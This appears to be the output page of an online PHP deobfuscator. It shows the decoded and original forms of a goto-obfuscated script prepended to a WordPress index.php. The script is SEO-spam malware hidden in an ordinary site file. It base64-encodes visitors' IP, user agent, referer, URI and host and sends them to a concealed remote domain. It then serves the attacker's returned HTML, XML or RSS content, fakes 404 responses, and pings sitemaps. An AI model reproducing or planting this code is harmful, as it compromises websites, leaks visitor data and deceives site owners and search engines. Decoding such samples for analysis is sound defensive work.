Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto ihHzK; JpiT5: $JG8yz = base64_decode($JG8yz); goto bg73d; Ux0n9: ob_clean(..
Decoded Output download
<?php goto ihHzK;
JpiT5:
$JG8yz = base64_decode($JG8yz);
goto bg73d;
Ux0n9:
ob_clean();
goto zdotP;
zdotP:
ob_end_clean();
goto gbqH0;
M3hPC:
exit;
goto pA1EW;
jMX28:
echo substr(trim($ckeNx[0]), 0, -7) . $ckeNx[1];
goto Z_ai8;
DTLjm:
if (!(substr(trim($ckeNx[0]), -7) == "echokkk")) {
goto egNSG;
}
goto p0z1I;
pA1EW: WSUsT:
goto IhMOc;
LgWRf:
if (!(substr(trim($ckeNx[0]), -7) == "echo404")) {
goto WSUsT;
}
goto Nt6GY;
ph7gm:
error_reporting(0);
goto Ux0n9;
fJrM2:
$ZT8uX = base64_encode(date_default_timezone_get());
goto gA5TJ;
HGh3g:
goto ZJ4n5;
goto SSH46;
SNMAj:
if (!(substr(trim($ckeNx[0]), -7) == "echoxml")) {
goto SekWx;
}
goto BnQW5;
BnQW5:
header("Content-type: text/xml");
goto lZafu;
dzJMY:
$ckeNx = explode("[#*#*#]", $WmBIb);
goto bX5nO;
dY2AA:
$FTuNs = "http://" . $JG8yz . "/index.php?domain=" . $BRqHd . "&uri=" . $eK0QQ . "&lan=" . $uOa2u . "&agent=" . $I2P8b . "&zone=" . $ZT8uX . "&ip=" . $ndVgf . "&goweb=" . base64_encode($JG8yz) . "&referer=" . $Yiv34;
goto yBXzY;
iLqq3:
$Yiv34 = base64_encode(@$_SERVER["HTTP_REFERER"]);
goto VZrw7;
lZafu:
echo substr(trim($ckeNx[0]), 0, -7) . $ckeNx[1];
goto Igw3K;
unuQn:
$I2P8b = base64_encode(@$_SERVER["HTTP_USER_AGENT"]);
goto iLqq3;
sjyXv:
$mIaa6 = "https://";
goto jktOU;
ihHzK:
$JG8yz = "ZTYxeDMucmFoZ3R2LnRvcA==";
goto JpiT5;
ySH8k:
exit;
goto DtP3g;
Dc41f:
echo substr(trim($ckeNx[0]), 0, -7) . $ckeNx[1];
goto FE4DR;
AnrZ_:
function FbXfE($jZXKv)
{
goto ok8d6;
YNTZu:
foreach ($viGVl as $BiDSm) {
goto kBql0;
z6O3G:
$FIPF3 = strpos($XuGF2, "Sitemap Notification Received") !== false || strpos($XuGF2, "") !== false ? "OK " : "<font color=red>ERROR </font><div style="background:#f5f5f5;padding:11px; border:1px solid #ccc;">" . $XuGF2 . "</div>";
goto zxdFR;
kBql0:
$XuGF2 = rGVgm($BiDSm);
goto z6O3G;
zxdFR:
echo $BiDSm . "===>Sitemap: " . $FIPF3 . "<br/>";
goto x520d;
x520d: XDnup:
goto tDwGp;
tDwGp:
}
goto P9Ftf;
ok8d6:
$viGVl = explode("|||", $jZXKv);
goto YNTZu;
P9Ftf: S_VtZ:
goto TJsam;
TJsam:
}
goto VTVns;
YTSH0:
$I_0Lo = @$_SERVER["HTTP_HOST"];
goto unuQn;
wbQMT:
$mIaa6 = "http://";
goto HGh3g;
TFVv3:
header("Status: 404 Not Found");
goto M3hPC;
vMri0:
$uOa2u = base64_encode(@$_SERVER["HTTP_ACCEPT_LANGUAGE"]);
goto J7op6;
nDgkZ:
echo substr(trim($ckeNx[0]), 0, -8) . $ckeNx[1];
goto Fizd8;
bg73d:
header("Content-Type: text/html; charset=utf-8");
goto q2iOu;
yvZnT:
if (!strstr($WmBIb, "[#*#*#]")) {
goto EcQrX;
}
goto dzJMY;
Z_ai8:
exit;
goto BlCHj;
jktOU: ZJ4n5:
goto vkRH2;
Igw3K:
exit;
goto DfHog;
RI2b6: fZ66i:
goto SNMAj;
J7op6:
$eK0QQ = base64_encode(@$_SERVER["REQUEST_URI"]);
goto YTSH0;
gbqH0:
ob_start();
goto vMri0;
gA5TJ:
if (viVeu()) {
goto hZoev;
}
goto wbQMT;
DfHog: SekWx:
goto aLrpq;
FE4DR:
exit;
goto Fp6qt;
bX5nO:
if (!(substr(trim($ckeNx[0]), -8) == "echohtml")) {
goto fZ66i;
}
goto nDgkZ;
VTVns:
function RgVgM($m8TGR)
{
goto AqIaU;
pn4pG: kOCKZ:
goto j8yjv;
AqIaU:
$WmBIb = @file_get_contents($m8TGR);
goto Q20YA;
iAzd5:
curl_setopt($IPE3S, CURLOPT_RETURNTRANSFER, 1);
goto fmAKg;
WZ7PY:
curl_setopt($IPE3S, CURLOPT_SSL_VERIFYHOST, 0);
goto WUQnf;
f8q1a:
$IPE3S = curl_init();
goto k09oR;
k09oR:
curl_setopt($IPE3S, CURLOPT_URL, $m8TGR);
goto WZ7PY;
KtBNw:
curl_close($IPE3S);
goto pn4pG;
Q20YA:
if ($WmBIb) {
goto kOCKZ;
}
goto f8q1a;
fmAKg:
$WmBIb = curl_exec($IPE3S);
goto KtBNw;
WUQnf:
curl_setopt($IPE3S, CURLOPT_SSL_VERIFYPEER, 0);
goto iAzd5;
j8yjv:
return $WmBIb;
goto eLGHR;
eLGHR:
}
goto L_G1X;
vkRH2:
$BRqHd = base64_encode($mIaa6 . $I_0Lo);
goto dY2AA;
Fizd8:
exit;
goto RI2b6;
BlCHj: egNSG:
goto LgWRf;
aLrpq:
if (!(substr(trim($ckeNx[0]), -7) == "echorss")) {
goto Cmgpq;
}
goto jovfm;
dt7RE:
Fbxfe($ckeNx[1]);
goto ySH8k;
q2iOu:
set_time_limit(0);
goto ph7gm;
IhMOc:
if (!(substr(trim($ckeNx[0]), -7) == "pingxml")) {
goto BS_Zx;
}
goto dt7RE;
Nt6GY:
header("HTTP/1.1 404 Not Found");
goto TFVv3;
p0z1I:
header("X-Robots-Tag: noindex");
goto jMX28;
jovfm:
header("Content-type: text/xml");
goto Dc41f;
VZrw7:
$ndVgf = base64_encode(@$_SERVER["REMOTE_ADDR"]);
goto fJrM2;
wV1YW: EcQrX:
goto AnrZ_;
DtP3g: BS_Zx:
goto wV1YW;
SSH46: hZoev:
goto sjyXv;
Fp6qt: Cmgpq:
goto DTLjm;
yBXzY:
$WmBIb = rgvgm($FTuNs);
goto yvZnT;
L_G1X:
function VIVeU()
{
goto ci0t3;
Lrjr_:
if (!empty($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off") {
goto r9Skr;
}
goto lys1C;
d8x0T:
return true;
goto aaj3X;
gwokc:
return true;
goto RTinU;
aaj3X:
goto L8eyy;
goto ZnAc1;
DnPBw:
goto L8eyy;
goto Fzjkq;
Fzjkq: r9Skr:
goto gwokc;
gOl6d:
if (isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") {
goto xx8Zp;
}
goto Lrjr_;
w4hCP:
return true;
goto DnPBw;
RTinU: L8eyy:
goto sQQii;
lys1C:
goto L8eyy;
goto EuBNq;
sQQii:
return false;
goto yovbY;
ZnAc1: xx8Zp:
goto w4hCP;
ci0t3:
if (!empty($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off") {
goto T_LgC;
}
goto gOl6d;
EuBNq: T_LgC:
goto d8x0T;
yovbY:
} ?><?php
define('WP_USE_THEMES', true);
require __DIR__ . '/wp-blog-header.php'; ?>Did this file decode correctly?
Original Code
<?php goto ihHzK;
JpiT5:
$JG8yz = base64_decode($JG8yz);
goto bg73d;
Ux0n9:
ob_clean();
goto zdotP;
zdotP:
ob_end_clean();
goto gbqH0;
M3hPC:
exit;
goto pA1EW;
jMX28:
echo substr(trim($ckeNx[0]), 0, -7) . $ckeNx[1];
goto Z_ai8;
DTLjm:
if (!(substr(trim($ckeNx[0]), -7) == "\x65\x63\x68\x6f\153\153\x6b")) {
goto egNSG;
}
goto p0z1I;
pA1EW: WSUsT:
goto IhMOc;
LgWRf:
if (!(substr(trim($ckeNx[0]), -7) == "\145\x63\x68\157\64\60\x34")) {
goto WSUsT;
}
goto Nt6GY;
ph7gm:
error_reporting(0);
goto Ux0n9;
fJrM2:
$ZT8uX = base64_encode(date_default_timezone_get());
goto gA5TJ;
HGh3g:
goto ZJ4n5;
goto SSH46;
SNMAj:
if (!(substr(trim($ckeNx[0]), -7) == "\145\x63\x68\157\x78\x6d\x6c")) {
goto SekWx;
}
goto BnQW5;
BnQW5:
header("\x43\157\156\164\145\x6e\164\x2d\x74\x79\x70\145\x3a\x20\164\145\170\x74\x2f\x78\155\x6c");
goto lZafu;
dzJMY:
$ckeNx = explode("\x5b\43\52\43\52\x23\x5d", $WmBIb);
goto bX5nO;
dY2AA:
$FTuNs = "\150\164\x74\x70\72\x2f\x2f" . $JG8yz . "\x2f\x69\x6e\x64\145\170\56\160\150\x70\77\144\x6f\x6d\141\x69\156\x3d" . $BRqHd . "\46\x75\x72\151\x3d" . $eK0QQ . "\46\154\x61\x6e\x3d" . $uOa2u . "\46\141\x67\145\x6e\164\75" . $I2P8b . "\46\x7a\157\x6e\145\75" . $ZT8uX . "\46\x69\x70\x3d" . $ndVgf . "\46\147\157\167\145\x62\x3d" . base64_encode($JG8yz) . "\46\x72\x65\146\145\162\145\162\75" . $Yiv34;
goto yBXzY;
iLqq3:
$Yiv34 = base64_encode(@$_SERVER["\x48\x54\124\120\137\x52\105\106\105\x52\105\122"]);
goto VZrw7;
lZafu:
echo substr(trim($ckeNx[0]), 0, -7) . $ckeNx[1];
goto Igw3K;
unuQn:
$I2P8b = base64_encode(@$_SERVER["\110\x54\124\x50\x5f\125\123\x45\122\137\101\107\105\116\x54"]);
goto iLqq3;
sjyXv:
$mIaa6 = "\x68\x74\164\160\x73\72\x2f\57";
goto jktOU;
ihHzK:
$JG8yz = "\x5a\x54\x59\x78\x65\x44\x4d\x75\x63\x6d\x46\x6f\x5a\x33\x52\x32\x4c\x6e\x52\x76\x63\x41\x3d\x3d";
goto JpiT5;
ySH8k:
exit;
goto DtP3g;
Dc41f:
echo substr(trim($ckeNx[0]), 0, -7) . $ckeNx[1];
goto FE4DR;
AnrZ_:
function FbXfE($jZXKv)
{
goto ok8d6;
YNTZu:
foreach ($viGVl as $BiDSm) {
goto kBql0;
z6O3G:
$FIPF3 = strpos($XuGF2, "\123\151\164\x65\x6d\141\160\x20\x4e\x6f\164\x69\146\151\x63\x61\x74\151\x6f\x6e\x20\122\145\143\145\151\x76\x65\x64") !== false || strpos($XuGF2, "\351\200\x81\344\277\241\xe3\x81\225\343\202\214\xe3\201\x9f\343\202\265\xe3\x82\xa4\xe3\x83\210\xe3\203\x9e\343\x83\203\343\x83\x97\xe3\202\x92\345\217\227\xe4\xbf\xa1\343\x81\227\343\x81\xbe\343\x81\x97\343\x81\237") !== false ? "\117\x4b\x20\346\x88\x90\345\x8a\x9f" : "\74\146\157\x6e\x74\x20\x63\x6f\154\x6f\x72\75\x72\145\x64\76\105\122\x52\x4f\122\40\xe5\207\272\xe9\x94\x99\344\xba\x86\74\x2f\x66\157\x6e\x74\x3e\x3c\144\x69\x76\40\x73\x74\x79\154\x65\75\42\142\x61\143\x6b\147\162\x6f\x75\156\144\72\43\x66\x35\x66\x35\146\x35\x3b\x70\141\x64\x64\151\x6e\147\x3a\x31\x31\160\x78\x3b\x20\142\x6f\x72\144\145\x72\x3a\x31\x70\x78\x20\163\x6f\x6c\151\x64\x20\x23\x63\143\x63\73\42\76" . $XuGF2 . "\74\57\144\151\x76\76";
goto zxdFR;
kBql0:
$XuGF2 = rGVgm($BiDSm);
goto z6O3G;
zxdFR:
echo $BiDSm . "\75\x3d\75\x3e\123\x69\x74\x65\155\141\x70\72\x20" . $FIPF3 . "\74\x62\162\57\76";
goto x520d;
x520d: XDnup:
goto tDwGp;
tDwGp:
}
goto P9Ftf;
ok8d6:
$viGVl = explode("\174\174\174", $jZXKv);
goto YNTZu;
P9Ftf: S_VtZ:
goto TJsam;
TJsam:
}
goto VTVns;
YTSH0:
$I_0Lo = @$_SERVER["\110\x54\124\120\137\110\x4f\x53\124"];
goto unuQn;
wbQMT:
$mIaa6 = "\x68\164\x74\x70\72\57\57";
goto HGh3g;
TFVv3:
header("\123\x74\x61\x74\165\163\x3a\40\x34\x30\64\x20\116\x6f\164\40\106\x6f\165\156\144");
goto M3hPC;
vMri0:
$uOa2u = base64_encode(@$_SERVER["\110\x54\124\120\137\x41\x43\x43\105\x50\x54\x5f\114\101\x4e\107\x55\x41\107\x45"]);
goto J7op6;
nDgkZ:
echo substr(trim($ckeNx[0]), 0, -8) . $ckeNx[1];
goto Fizd8;
bg73d:
header("\103\x6f\156\164\145\156\164\x2d\124\171\160\x65\x3a\x20\164\145\x78\x74\x2f\x68\x74\x6d\154\73\x20\x63\x68\x61\162\x73\145\x74\75\x75\164\x66\x2d\x38");
goto q2iOu;
yvZnT:
if (!strstr($WmBIb, "\x5b\43\52\43\x2a\43\135")) {
goto EcQrX;
}
goto dzJMY;
Z_ai8:
exit;
goto BlCHj;
jktOU: ZJ4n5:
goto vkRH2;
Igw3K:
exit;
goto DfHog;
RI2b6: fZ66i:
goto SNMAj;
J7op6:
$eK0QQ = base64_encode(@$_SERVER["\122\105\121\x55\x45\123\124\137\x55\x52\x49"]);
goto YTSH0;
gbqH0:
ob_start();
goto vMri0;
gA5TJ:
if (viVeu()) {
goto hZoev;
}
goto wbQMT;
DfHog: SekWx:
goto aLrpq;
FE4DR:
exit;
goto Fp6qt;
bX5nO:
if (!(substr(trim($ckeNx[0]), -8) == "\145\x63\x68\157\150\164\x6d\x6c")) {
goto fZ66i;
}
goto nDgkZ;
VTVns:
function RgVgM($m8TGR)
{
goto AqIaU;
pn4pG: kOCKZ:
goto j8yjv;
AqIaU:
$WmBIb = @file_get_contents($m8TGR);
goto Q20YA;
iAzd5:
curl_setopt($IPE3S, CURLOPT_RETURNTRANSFER, 1);
goto fmAKg;
WZ7PY:
curl_setopt($IPE3S, CURLOPT_SSL_VERIFYHOST, 0);
goto WUQnf;
f8q1a:
$IPE3S = curl_init();
goto k09oR;
k09oR:
curl_setopt($IPE3S, CURLOPT_URL, $m8TGR);
goto WZ7PY;
KtBNw:
curl_close($IPE3S);
goto pn4pG;
Q20YA:
if ($WmBIb) {
goto kOCKZ;
}
goto f8q1a;
fmAKg:
$WmBIb = curl_exec($IPE3S);
goto KtBNw;
WUQnf:
curl_setopt($IPE3S, CURLOPT_SSL_VERIFYPEER, 0);
goto iAzd5;
j8yjv:
return $WmBIb;
goto eLGHR;
eLGHR:
}
goto L_G1X;
vkRH2:
$BRqHd = base64_encode($mIaa6 . $I_0Lo);
goto dY2AA;
Fizd8:
exit;
goto RI2b6;
BlCHj: egNSG:
goto LgWRf;
aLrpq:
if (!(substr(trim($ckeNx[0]), -7) == "\145\x63\x68\157\x72\163\x73")) {
goto Cmgpq;
}
goto jovfm;
dt7RE:
Fbxfe($ckeNx[1]);
goto ySH8k;
q2iOu:
set_time_limit(0);
goto ph7gm;
IhMOc:
if (!(substr(trim($ckeNx[0]), -7) == "\160\x69\156\147\x78\155\x6c")) {
goto BS_Zx;
}
goto dt7RE;
Nt6GY:
header("\x48\124\x54\120\x2f\x31\x2e\61\40\64\x30\x34\40\x4e\157\x74\40\106\157\x75\156\x64");
goto TFVv3;
p0z1I:
header("\x58\55\122\157\x62\x6f\x74\x73\x2d\x54\x61\147\72\40\156\x6f\x69\x6e\x64\145\170");
goto jMX28;
jovfm:
header("\103\157\156\x74\145\156\164\55\164\171\x70\145\x3a\x20\x74\x65\170\x74\57\x78\x6d\154");
goto Dc41f;
VZrw7:
$ndVgf = base64_encode(@$_SERVER["\122\105\x4d\x4f\124\x45\137\x41\104\x44\x52"]);
goto fJrM2;
wV1YW: EcQrX:
goto AnrZ_;
DtP3g: BS_Zx:
goto wV1YW;
SSH46: hZoev:
goto sjyXv;
Fp6qt: Cmgpq:
goto DTLjm;
yBXzY:
$WmBIb = rgvgm($FTuNs);
goto yvZnT;
L_G1X:
function VIVeU()
{
goto ci0t3;
Lrjr_:
if (!empty($_SERVER["\110\x54\124\x50\137\106\x52\x4f\x4e\124\x5f\105\x4e\104\137\x48\124\x54\120\123"]) && strtolower($_SERVER["\x48\x54\x54\x50\x5f\106\122\117\116\x54\x5f\x45\x4e\x44\137\110\124\124\120\x53"]) !== "\x6f\146\x66") {
goto r9Skr;
}
goto lys1C;
d8x0T:
return true;
goto aaj3X;
gwokc:
return true;
goto RTinU;
aaj3X:
goto L8eyy;
goto ZnAc1;
DnPBw:
goto L8eyy;
goto Fzjkq;
Fzjkq: r9Skr:
goto gwokc;
gOl6d:
if (isset($_SERVER["\x48\124\124\120\137\x58\137\x46\117\122\x57\x41\122\x44\x45\x44\x5f\120\x52\x4f\x54\x4f"]) && $_SERVER["\110\124\124\x50\137\x58\x5f\106\117\122\127\x41\x52\104\x45\104\x5f\120\x52\x4f\124\117"] === "\x68\164\x74\x70\x73") {
goto xx8Zp;
}
goto Lrjr_;
w4hCP:
return true;
goto DnPBw;
RTinU: L8eyy:
goto sQQii;
lys1C:
goto L8eyy;
goto EuBNq;
sQQii:
return false;
goto yovbY;
ZnAc1: xx8Zp:
goto w4hCP;
ci0t3:
if (!empty($_SERVER["\110\124\x54\120\123"]) && strtolower($_SERVER["\x48\124\124\120\x53"]) !== "\157\x66\146") {
goto T_LgC;
}
goto gOl6d;
EuBNq: T_LgC:
goto d8x0T;
yovbY:
} ?><?php
define('WP_USE_THEMES', true);
require __DIR__ . '/wp-blog-header.php';Function Calls
| None |
Stats
| MD5 | 0457b08e32547e239c221f693fe2f4df |
| Eval Count | 0 |
| Decode Time | 40 ms |